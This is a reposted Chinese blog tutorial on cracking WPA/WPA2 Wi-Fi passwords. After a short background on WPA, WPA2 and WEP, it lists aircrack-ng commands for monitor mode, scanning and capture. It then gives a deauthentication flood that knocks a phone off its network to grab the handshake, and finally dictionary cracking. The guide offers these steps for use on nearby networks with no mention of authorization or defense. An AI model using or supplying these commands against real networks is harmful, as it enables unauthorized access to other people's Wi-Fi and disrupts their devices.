无线安全

实战破解WPA无线网

字号+ 作者:微风 来源:转载 2017-03-07 09:26 我要评论( )

WPA简介: WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)......

WPA简介:
WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)中找到 的几个严重的弱点而产生的。WPA实作了IEEE 802.11i标准的大部分,是在802.11i完备之前替代WEP的过渡方案。WPA的设计可以用在所有的无线网卡上,但未必能用在第一代的无线取用点 上。WPA2具备完整的标准体系,但其不能被应用在某些老旧型号的网卡上。
WPA2简介:
WPA2 (WPA 第二版) 是 Wi-Fi 联盟对采用 IEEE 802.11i 安全增强功能的产品的认证计划。简单一点理解,WPA2是基于WPA的一种新的加密方式。
“Wi-Fi 联盟”是一家对不同厂商的无线 LAN 终端产品能够顺利地相互连接进行认证的业界团体,由该团体制定的安全方式是“WPA (Wi-Fi Protected Access, Wi-Fi 保护访问)”。2004 年 09 月发表的“WPA2”支持“AES”加密方式。除此之外,与过去的 WPA 相比在功能方面没有大的区别。古老的“WEP”加密方式,在安全上存在着若被第三者恶意截获信号密码容易被破解的问题。但也有部分较老的设备不支持此加密 方式。

区别:
wpa和wpa2采取的加密算法不同。wpa是wpa2的更低级的加密。WPA2是WPA的升级版,现在新型的网卡,AP都支持WPA2加密。WPA2则采用了更为安全的算法。

继WEP之后,因为WEP加密不够安全,所以就出现了WPA/WPA2的加密算法,相对来说,后者的加密更加安全。所以破解也没有破解WEP那样轻而易举,因为破解后者需要跑字典。
然后,开始抓握手包这边需要注意一点
airodump-ng –c 信号道数 –w 抓包文件名 wlan0mon 这个抓包文件名必须得.cap格式的 因为这个我网络数据包,细节是关键。

感谢作者:微风

工具:USB网卡 虚拟机kali linux

开启网卡

ifconfig wlan0 up

进入监听模式

airmon-ng start wlan0


开始扫描附近wifi

airodump-ng wlan0mon


开始抓包

airodump-ng –c 信号道数 –w 抓包文件名 wlan0mon


利用洪水攻击打断手机的wifi 抓取握手包

aireplay-ng -0 10(打十次) –a 路由的mac地址 –c 手机的mac地址 wlan0mon


开始跑字典破解密码

aircrack-ng –w 字典文件的路径 抓包文件名

文章评价:4分
建议:可以写的更加详细一点,说明使用此方法的理由及背景。


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Wifi/579.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~